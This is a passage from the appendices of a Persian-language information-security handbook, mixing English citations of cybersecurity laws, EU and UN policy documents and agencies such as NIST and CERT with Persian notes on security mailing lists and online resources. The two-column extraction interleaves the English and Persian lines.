from the Commission to the Council, the Infrastructure Protection Handbook, edited
European Parliament, the European by Andreas Wenger, Jan Metzger and
Economic And Social Committee and the Myriam Dunn, Center for Security
Committee of the Regions - Network and Studiesand Conflict Research, Swiss
Information Security: Proposal for a Federal Institute of Technology (2002):
European Policy Approach, June 6, 2001, http://www.isn.ethz.ch/crn
COM(2001) 298 final,
http://europa.eu.int/information_society/eeurop U.S. Presidential Decision Directive 63:
e/news_library/new_documents/index_en.htm Critical Infrastructure Protection, May 22,
1998;
European Commission, Communication http://www.fas.org/irp/offdocs/pdd-63.htm
from the Commission to the Council, the
European Parliament, the Economic and
Social Committee and the Committee on the
501 Electronic Attack Response Group
٤٧٥ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

Michael Nugent, It Can’t Happen Here, Wall Regions - Creating a Safer Information
Street Technology Association, Ticker, A Society by Improving the Security of
Technology Magazine For Industry Information Infrastructures and Combating
Profession (2003), Computer-related Crime, Jan. 26, 2001,
http://www.wsta.org/publications/articles/040 COM(20000) 890 final,
2_article03.html http://europa.eu.int/ISPO/eif/InternetPolicies
Site/Crime/CrimeCommEN.html
Carol A. Siegel, Ty R. Sagalow, Paul
Serritella, Cyber Risk Management Homeland Security Act,
Technical and Insurance Controls for http://www.whitehouse.gov/deptofhomeland/
Enterprise-Level Security, Security analysis/
Management Practices, pg. 42,
(September/October 2002). Federal Information Security Management
http://www.gsu.edu/~accrss/Security_and_B Act, Title IIIof E-Government Act of 2002,
usiness_Risk.pdf. Pub. Law 107-347,
http://csrc.nist.gov/policies/FISMA-final.pdf.
‫ ﻃﻴﻒ ﻭﺳـﻴﻌﻲ‬٥٠٢(CSRC) NIST ‫ﻣﺮﻛﺰ ﻣﻨﺎﺑﻊ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ‬ Thomas J. Smedinghoff, The Developing
،‫ﺍﺯ ﻣﻄﺎﻟﺐ ﺍﻣﻨﻴﺘﻲ ﺷﺎﻣﻞ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻭ ﻛﺎﺭﺑﺮﺩ ﺁﻧﻬﺎ‬ U.S. Legal Standard for Cyber-security,
Baker & McKenzie, Chicago,
‫ ﻗﺎﺑﻠﻴـﺖ‬،‫ ﺳﻴﺴﺘﻤﻬﺎﻱ ﮔـﻮﺍﻫﻲ‬،‫ ﺗﺤﻘﻴﻘﺎﺕ ﺍﻣﻨﻴﺘﻲ‬،‫ﺁﺯﻣﻮﻥ ﺍﻣﻨﻴﺖ‬
http://www.bmck.com/ecommerce/us%20cy
‫ ﺍﻣﻨﻴـﺖ‬،‫ ﺑﺎﺯﮔﺸﺖ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻳﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬،‫ﺍﻃﻤﻴﻨﺎﻥ ﺳﻴﺴﺘﻢ‬ ber-security%20standards.pdf
‫ ﻭ ﻧﻴﺰ ﺗﺠﺎﺭﺏ ﺍﻣﻨﻴﺘﻲ ﺍﺭﮔﺎﻧﻬﺎﻱ ﻣﻠـﻲ‬،‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺸﺎﻏﻞ ﻛﻮﭼﻚ‬
‫ﻛﻤﻴﺴﻴﻮﻥ ﺣﻔﺎﻇﺖ ﻭ ﻣﺒﺎﺩﻻﺕﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻋﻠﻴـﻪ ﺷـﺮﻛﺘﻬﺎﻳﻲ‬
‫ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ‬.(http://csrc.nist.gov/) ‫ﺭﺍ ﻣﻨﺘــﺸﺮ ﻛــﺮﺩﻩ ﺍﺳــﺖ‬
‫ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧﻮﺩ ﺩﺭ ﻣﻘﺎﺑﻞ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠـﺎﺯ‬
:‫ ﻧﻴﺰ ﺩﺭ ﺁﺩﺭﺱ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ‬NIST ‫ﺍﻧﺘﺸﺎﺭﺍﺕ‬
http://csrc.nist.gov/publications/index.html
‫ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﻣﺤﻔﺎﻇﺖ ﺑﻌﻤﻞ ﻧﻤـﻲﺁﻭﺭﻧـﺪ ﺍﻗـﺪﺍﻣﺎﺕ ﻗـﺎﻧﻮﻧﻲ‬
‫ ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ ﻣﻨﺒـﻊ ﺯﻳـﺮ‬.‫ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ‬
National Security Agency, Security :‫ﻣﺮﺍﺟﻌﻪ ﻧﻤﺎﻳﻴﺪ‬
Recommendation Guides,
http://nsa1.www.conxion.com/
SEC v. National Business Communications
CERT/Coordination Center, Software Corp., SEC Litig. Release No. 11223, Sept.
Engineering Institute, Carnegie Mellon 19, 1986, SEC Litig. Release No. 11229,
University, http://www.cert.org/ Sept. 26, 1986. In the Matter of Material
Sciences Corporation, SEC Litig. Release
European Commission, Communication No. 41930, Sept. 28, 1999.
from the Commission to the Council, the
European Parliament, the European Sarbanes-Oxley Act of 2002, Pub. Law 107-
Economic And Social Committee and the 204.
Committee of the Regions - Network and
Information Security: Proposal for a http://www.aicps.org; http://www.isaca.org.
European Policy Approach, June6, 2001,
COM(2001) 298 final, ‫ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ‬،‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﻭﺷﻦ ﺷـﺪ‬
http://europa.eu.int/information_society/eeurop ‫ ﺩﺭ ﺯﻣﻴﻨـــﺔ ﺍﻣﻨﻴـــﺖ‬OECD ‫ ﺍﺯ ﺭﻫﻨﻤﻮﻧﻬـــﺎﻱ‬- ‫ﺭﺍﻳﺎﻧـــﻪﺍﻱ‬
e/news_library/new_documents/index_en.htm
‫ﺑﺨﺶ ﺷﺸﻢ‬

‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﮔﺮﻓﺘﻪ ﺗﺎ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‬


Proposal for a Regulation of the European ‫ ﺑﻄـﻮﺭ‬- ‫ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﻧﻬﺎﺩﻫﺎﻱ ﻏﻴﺮﺩﻭﻟﺘﻲ ﻣـﺪﻭﻥ ﺷـﺪﻩﺍﻧـﺪ‬
Parliament and of the Council Establishing
the European Network and Information ‫ﮔﺴﺘﺮﺩﻩﺍﻱ ﺩﺭ ﺟﺎﻣﻌﺔ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻣـﻮﺭﺩ ﭘـﺬﻳﺮﺵ ﻗـﺮﺍﺭ‬
Security Agency, Commission of the ‫ ﺑﺮﺍﻱ ﺗﻮﺿﻴﺤﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻛﺘﺎﺏ ﺯﻳـﺮ ﻳـﻚ‬.‫ﮔﺮﻓﺘﻪﺍﻧﺪ‬
European Communities, Feb. 11, 2003,
:‫ﻧﮕﺎﻩ ﮔﺬﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‬
502 NIST’s Computer Security Resource
Center(CSRC)
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ٤٧٦

the Eighth Session, Apr. 27-May 6, 1999, COM(2003) 63 final, 2003/0032 (COD),
E/CN.15/1999/12, http://europa.eu.int/information_society/eeurop
http://www.un.org/documents/ecosoc/docs/1 e/action_plan/safe/documents/nisa_en.pdf
999/e1999-30.htm.
Proposal for a Regulation of the European
UN, International Review of Criminal Policy - Parliament and of the Council Establishing
United Nations Manual on the Prevention the European Network and Information
and Control of Computer-Related Crime, Security Agency, Commission of the
http://www.uncjin.org/Documents/EighthCon European Communities, Feb. 11, 2003,
gress.html COM(2003) 63 final, 2003/0032 (COD),
http://europa.eu.int/information_society/eeurop
‫ﮔﺰﺍﺭﺵ ﻛﻤﻴﺴﻴﻮﻥ ﺍﻗﺘﺼﺎﺩﻱ ﻭ ﺍﺟﺘﻤﺎﻋﻲ ﺷﻮﺭﺍﻱ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻥ‬ e/action_plan/safe/documents/nisa_en.pdf

‫ﻣﻠﻞ ﺩﺭ ﺯﻣﻴﻨﺔ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﻋﺪﺍﻟﺖ ﻣﺠﺮﻣﺎﻧـﻪ ﻛـﻪ‬ Protecting Developing Economies from
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ ﻭ ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺩﺭ ﺣﻮﺯﺓ‬ Cyber Attack – Assistance to Build Regional
Cyber-security Preparedness, APEC Media
:‫ﺟﺮﺍﺋﻢ ﻓﻀﺎﻱ ﻣﺠﺎﺯﻱ ﻭ ﺍﻣﻨﻴﺖ ﻣﺠﺎﺯﻱ ﺭﺍ ﺧﻼﺻﻪ ﻛﺮﺩﻩ ﺍﺳﺖ‬ Release, Mar. 18, 2003,
Effective measures to prevent and control http://www.apecsec.org.sg/whatsnew/press/Press
computer-related crime, E/CN.15/2002/8, Rel_ProtectgFromCyberAttack_180303.html
Report of the Secretary-General, United
Nations, Economic and Social Council, http://www.ncs.gov/NSTAC/attf.html
Commission on Crime Prevention and
Criminal Justice, Eleventh Session, Vienna, Jody R. Westby, ed., International Guide to
Apr. 16-25, 2002, Combating Cybercrime, AmericanBar
http://www.unodc.org/pdf/crime/commissions Association, Section of Science &
/11comm/8e.pdf Technology Law, Privacy & Computer Crime
Committee, by The American Bar
Gramm-Leach Bliley Act, 15 USC, Association’s Privacy & Computer Crime
Subchapter 1, § 6801. Committee 2003,
http://www.abanet.org/abapubs/books/cyber
Appendix B to Part 570—Interagency crime/
Guidelines Establishing Standards for
Safeguarding Customer Information, Part III, UN General Assembly, Resolution 55/63,
http://www.occ.treas.gov/fr/fedregister/66fr8 Combating the criminal misuse of
616.htm information technologies, Dec. 4, 2000,
http://www.nvk2000.ru/apec/documents/Inter
Financial Institutions and Customer Data: national_Agreements/55-63_English.pdf
Complying with the Safeguards Rule,
http://www.ftc.gov/bcp/conline/pubs/buspubs UN General Assembly, Resolution 56/121,
/safeguards.htm Combating the criminal misuse of
information technologies, Jan. 23, 2002,
Standards for Safeguarding Customer http://ods-dds-ny.un.org/doc/UNDOC/
Information, 67 Fed. Reg. 36484-94, May
23, 2000, (codified at 16 C.F.R. Part 314), ETS no. 185:
http://www.ftc.gov/os/2002/05/67fr36585.pdf http://conventions.coe.int/treaty/EN/cadrepri
ncipal.htm
Technology Risk Management Guidelines
for FinancialInstitutions, Monetary Authority Eighth United Nations Congress on the
of Singapore, Draft Nov. 11, 2002, Prevention of Crime and the Treatment of
http://www.mas.gov.sg/display.cfm?id=94D0 Offenders, Havana, Aug. 27- Sept. 7, 1990,
63CD-5EB6-4636-82B5A725F9F6E9F5 report prepared by the Secretariat, UN
publication, Sales No. E.91.IV.2, chap I.
45 CFR §160, 162, 164;
http://www.cms.hhs.gov/hipaa/hipaa2/regula :‫ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ‬،‫ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﻣﺘﻦ ﺍﻳﻦ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ‬
tions/security/default.asp United Nations Commission on Crime
Prevention and Criminal Justice, Report on
٤٧٧ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

Forum of Incident Response and Security HIPAA, 42 U.S.C. Section 1320d-2(d)(2).


Teams, the worldwide consortium of major
computer incident response groups. Linda A. Malek and Brian R. Krex, “HIPAA’s
http://www.first.org security rule becomes effective 2005,” The
National Law Journal,Mar. 31, 2003 at B14
‫ ﻓﺮﻭﺷﻨﺪﻩ ﻳﻚ ﻣﺸﻜﻞ‬۱۱ ‫ ﺩﺭ ﺧﺼﻮﺹ‬۱۹۹۹ ‫ ﺩﺭ ﺩﺳﺎﻣﺒﺮ‬ISS
http://europa.eu.int/comm/internal_market/pr
‫ ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻥ‬،‫ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺍﻋﻼﻡ ﻛﺮﺩ‬ ivacy/law_en.htm
‫ ﺑﺮﺍﻱ‬.‫ ﺑﻪ ﻣﻄﺒﻮﻋﺎﺕ ﺩﺍﺩ‬۲۰۰۰ ‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺭﺍ ﺩﺭ ﻓﻮﺭﻳﺔ‬
:‫ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﺁﺩﺭﺱ ﺯﻳﺮ ﺭﺟﻮﻉ ﻛﻨﻴﺪ‬ ‫ﺁﻳﻴﻦﻧﺎﻣﻪﺍﻱ ﺑﺮﺍﻱ ﺭﻓﻊ ﻧﮕﺮﺍﻧﻴﻬﺎ ﺩﺭ ﺧﺼﻮﺹ ﭘﺮﺩﺍﺯﺵ ﺍﻃﻼﻋﺎﺕ‬
‫ﺷﺨﺼﻲ ﻭ ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺗﺠﺎﺭﺕ‬
http://www.cnn.com/2000/TECH/computing/ :‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
02/04/shop.glitch.idg

Dos and Don’ts of Client Authentication on Directive 2002/58/EC of the European


the Web, USENIX and MIT Technical Report Parliament and of the Council of 12 July
818, by Kevin Fu, Emil Sit, Kendra Smith, 2002
and Nick Feamster
Directive on privacy and electronic
communications, Article 4(1), Official Journal
L 201/37, July 31, 2002, at 37-47 (replacing EU
Directive 97/66/EC),
http://europa.eu.int/smartapi/cgi/sga_doc?s
martapi!celexapi!prod!CELEXnumdoc&lg=en
&numdoc=32002L0058&model=guichet

Security Breach Information Act (SB 1386),


added to the California Civil Code as Section
1798.29; Keith Poulsen, California
disclosure law has national reach,
SecurityFocus Online, Jan. 6, 2003,
http://online.securityfocus.com/news/1984.

Michael Vatis, Testimony House


Government Reform Committee, April 8,
2003; Sen. Bennett’s proposal.

‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

http://news.cnet.com/news/0-1005-200-
4523277.html

http://www.wired.com/news/technology/0,12
82,34496,00.html
‫ﺑﺨﺶ ﺷﺸﻢ‬

http://www.microsoft.com/technet/security/bu
lletin/MS01-017.asp
‫‪٤٧٩‬‬ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫ﻻ ﺩﺭ ﺍﻳﻦ ﻓﻬﺮﺳﺘﻬﺎ ﺗﻌﺪﺍﺩﻱ ﻣﺘﺨﺼﺺ ﻭﺍﻗﻌـﻲ‬ ‫ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﻣﻌﻤﻮ ﹰ‬


‫ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﺎﻳﻠﻨﺪ ﺩﺍﻧﺶ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﻫﻤﮕﺎﻥ ﺑﻪﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻧﺪ ﻭ‬
‫ﻫﻤﻴﻦ ﻛﻤﻚ ﺁﻧﻬـﺎ ﺑﺎﻋـﺚ ﭘﻴـﺸﺮﻓﺖ ﺩﺍﻧـﺶ ﻋﻤـﻮﻣﻲ ﺍﻳﻨﺘﺮﻧـﺖ‬
‫ﻣﻲﮔﺮﺩﺩ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺻﺮﻑ ﺍﻳﻨﻜـﻪ ﻧﻜﺘـﻪﺍﻱ‬
‫ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎ ﻧﻴﺴﺖ ﻛﻪ ﻳﻚ ﻧﻜﺘﺔ ﻣﻔﻴﺪ ﻭ‬ ‫ﭘﻴﻮﺳﺖ ‪۳‬‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﻭ ﻣﺤﻴﻂ ﺷﻤﺎ ﺍﺳﺖ‪ ،‬ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎ ﻧﻴـﺴﺖ‬
‫ﻛﻪ ﺩﻗﻴﻖ ﻭ ﻓﺎﺭﻍ ﺍﺯ ﻫﺮﮔﻮﻧﻪ ﺧﻄﺎ ﻭ ﺍﺷﺘﺒﺎﻩ ﺍﺳﺖ‪ ،‬ﺑـﻪ ﺍﻳـﻦ ﻣﻌﻨـﺎ‬
‫ﻣﻨﺎﺑﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﻧﻴﺴﺖ ﻛﻪ ﺑﺎ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺷـﻤﺎ ﻣﻄﺎﺑﻘـﺖ ﺩﺍﺭﺩ‪ ،‬ﻭ ﺍﺯ‬
‫ﺗﻬﻴﺔ ﻳﻚ ﻓﻬﺮﺳﺖ ﺟﺎﻣﻊ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ ﻳـﻚ ﺳـﻨﺪ‬
‫ﻫﻤﻪ ﻣﻬﻤﺘﺮ ﺍﻳﻨﻜﻪ ﻧﻤﻲﺗﻮﺍﻥ ﮔﻔﺖ ﺣﺘﻤﹰﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﻪ ﺍﺭﺗﻘـﺎﻱ‬
‫ﭼﺎﭘﻲ ﺑﺴﻴﺎﺭ ﻣﺸﻜﻞ ﺍﺳﺖ‪ .‬ﻣﻨـﺎﺑﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻣﺜـﻞ ﺻـﻔﺤﺎﺕ‬
‫ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺷﻤﺎ ﻛﻤﻚ ﻧﻤﺎﻳﺪ‪ .‬ﻫﻤﻴـﺸﻪ ﻗﺒـﻞ ﺍﺯ ﺑﻜـﺎﺭ ﺑـﺴﺘﻦ‬
‫ﻭﺏ‪ ،‬ﮔﺮﻭﻫﻬﺎﻱ ﺧﺒﺮﻱ ﻭ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﺗﻘﺮﻳﺒﹰﺎ ﻫـﺮ ﺳـﺎﻋﺖ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺍﺯ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﺑـﻪ‬
‫ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ؛ ﻭ ﻭﻳﺮﺍﻳﺸﻬﺎﻱ ﺟﺪﻳﺪ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻧﻴـﺰ‬
‫ﺩﻗﺖ ﻣﻮﺭﺩ ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺮ ﭼﻨﺪ ﻫﻔﺘﻪ ﻳﻜﺒﺎﺭ ﻣﻨﺘﺸﺮ ﺷﻮﻧﺪ‪.‬‬
‫ﻣﺸﻜﻞ ﺑﺰﺭﮒ ﻓﻬﺮﺳﺖﻫﺎﻱ ﭘﺴﺘﻲ‬
‫ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﺎ ﻧﺎﭼﺎﺭﻳﻢ ﻣﻨﺎﺑﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺫﻳﻞ ﺭﺍ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻨﻜـﻪ‬
‫ﻣﺸﻜﻞ ﺗﻤﺎﻣﻲ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺍﺗﻜﺎ ﺑﻪ ﺁﻧﻬـﺎ‪،‬‬ ‫ﻟﺰﻭﻣﹰﺎ ﻓﻬﺮﺳﺖ ﻛﺎﻣﻞ ﻭ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﺷﺪﻩﺍﻱ ﻧﻴﺴﺘﻨﺪ ﺍﺭﺍﺋﻪ ﺩﻫﻴﻢ‬
‫ﺑﺴﺎﺩﮔﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﻼﻓﻪ ﻭ ﺳﺮﺩﺭﮔﻢ ﺷﻮﻳﺪ‪ .‬ﺍﮔﺮ ﺩﺭ ﻓﻬﺮﺳﺖ‬ ‫ﻭ ﺍﻣﻴﺪﻭﺍﺭﻳﻢ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﻔﻴﺪ ﻭﺍﻗﻊ ﺷﻮﻧﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺍﻣﻴﺪﻭﺍﺭﻳﻢ ﻛﻪ‬
‫ﻲ ﺩﻭ ﺗـﻴﻢ ﭘﺎﺳـﺨﮕﻮﻱ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ‪ ،‬ﭼﻬـﺎﺭ ﻧﻤﺎﻳﻨـﺪﮔﻲ‬‫ﭘﺴﺘ ﹺ‬ ‫ﺑﺎ ﺧﻮﺍﻧﺪﻥ ﺍﻳﻦ ﻣﻄﺎﻟﺐ‪ ،‬ﺩﻳﺪﮔﺎﻩ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﭘﻴﺸﺮﻓﺘﻬﺎﻱ ﺁﺗـﻲ‬
‫ﻣﻌﺘﺒﺮ‪ ،‬ﻭ ﭼﻨﺪ ﮔﺮﻭﻩ ﺗﺨﺼﺼﻲ ﻋﻀﻮ ﺑﺎﺷﻴﺪ‪ ،‬ﻫﻨﮕﺎﻡ ﺍﻓﺸﺎﻱ ﻳـﻚ‬ ‫ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ‪.‬‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻣﺠﺒﻮﺭ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ ﺻﺪﻫﺎ ﭘﻴﺎﻡ ﻣﺘﻔـﺎﻭﺕ ﺭﺍ ﺩﺭ ﺭﻭﺯ‬
‫ﺣﺬﻑ ﻛﻨﻴﺪ‪ .‬ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﻧﻤﻲﺧﻮﺍﻫﻴﺪ ﺍﺯ ﻋﻀﻮﻳﺖ ﺍﻳﻦ ﻓﻬﺮﺳﺘﻬﺎ‬
‫ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ‬
‫ﺩﺭ ﺁﻳﻴﺪ؛ ﭼﺮﺍﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻮﺭﺩﻱ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺩﻫﻴﺪ ﻛﻪ ﺷﺎﻳﺪ‬
‫ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﻣﺨﺘﻠﻔﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻮﺿﻮﻋﺎﺕ ﻣﺘﻔـﺎﻭﺕ‬
‫ﻣﻲﺗﻮﺍﻧﺴﺖ ﺑﻪ ﺍﺻﻼﺡ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻛﻤﻚ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﭘﻮﺷﺶ ﻣﻲﺩﻫﻨﺪ ﻭ ﻣـﺎ ﺩﺭ ﺍﻳﻨﺠـﺎ ﺑـﻪ ﻣﻬﻤﺘـﺮﻳﻦ ﺁﻧﻬـﺎ‬
‫ﺭﻭﻳﻜﺮﺩﻱ ﻛﻪ ﺑﺮﺧﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎ ﺍﺟﺮﺍﻱ ﺁﻥ ﻣﻮﻓﻘﻴﺘﻬﺎﻳﻲ ﺑﺪﺳـﺖ‬ ‫ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﻴﻢ؛ ﺍﻣﺎ ﻧﺒﺎﻳﺪ ﮔﻤﺎﻥ ﻛﺮﺩ ﻛﻪ ﺍﻳﻦ ﻓﻬﺮﺳـﺘﻬﺎ ﺑﺘﻨﻬـﺎﻳﻲ‬
‫ﺁﻭﺭﺩﻩﺍﻧﺪ‪ ،‬ﺗﻘﺴﻴﻢﺑﻨﺪﻱ ﺍﻳﻦ ﻓﻬﺮﺳﺘﻬﺎ ﻣﻴﺎﻥ ﮔﺮﻭﻫـﻲ ﺍﺯ ﺭﺍﻫﺒـﺮﺍﻥ‬ ‫ﺗﻤﺎﻡ ﺍﺑﻌﺎﺩ ﺍﻣﻨﻴﺖ ﺭﺍ ﭘﻮﺷﺶ ﻣﻲﺩﻫﻨﺪ‪ .‬ﻣﻄﻤﺌﻨﹰﺎ ﻓﻬﺮﺳﺘﻬﺎﻱ ﺑﺴﻴﺎﺭ‬
‫ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ﻫﺮ ﺭﺍﻫﺒﺮ ﺩﺭ ﻳـﻚ ﻳـﺎ ﺩﻭ ﻓﻬﺮﺳـﺖ ﭘـﺴﺘﻲ‬ ‫ﺧﻮﺏ ﻭ ﮔﻤﻨﺎﻡ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺍﻃﻼﻋـﺎﺕ ﺑـﺴﻴﺎﺭ‬
‫ﻋﻀﻮﻳﺖ ﺩﺍﺭﺩ ﻭ ﺑﺮ ﭘﻴﺎﻣﻬﺎﻱ ﻫﻤﺎﻥ ﻓﻬﺮﺳﺘﻬﺎ ﻧﻈﺎﺭﺕ ﻣـﻲﻛﻨـﺪ ﻭ‬ ‫ﻣﻔﻴﺪﺗﺮﻱ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭﺗﺎﻥ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫ﭘﻴﺎﻣﻬﺎﻱ ﻣﻔﻴﺪ ﺁﻧﻬﺎ ﺭﺍ ﻣﻴﺎﻥ ﺗﻤﺎﻡ ﺍﻓﺮﺍﺩ ﮔﺮﻭﻩ ﺗﻮﺯﻳﻊ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺩﺭ‬
‫ﻼ‬
‫ﻫﺮﮔﺰ ﺑـﻪ ﻣﻄـﺎﻟﺒﻲ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﻓﻬﺮﺳـﺘﻬﺎ ﻣـﻲﺧﻮﺍﻧﻴـﺪ ﻛـﺎﻣ ﹰ‬
‫ﺍﻳﻦ ﺣﺎﻟﺖ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﺍﮔﺮ ﻳﻜﻲ ﺍﺯ ﺍﻋﻀﺎ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﺭﺍ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﻧﻜﻨﻴﺪ؛ ﺧﺼﻮﺻﹰﺎ ﺍﮔﺮ ﺁﻥ ﻓﻬﺮﺳﺖ ﻣﺸﻜﻮﻙ ﺑﻨﻈﺮ ﺑﻴﺎﻳﺪ‪.‬‬
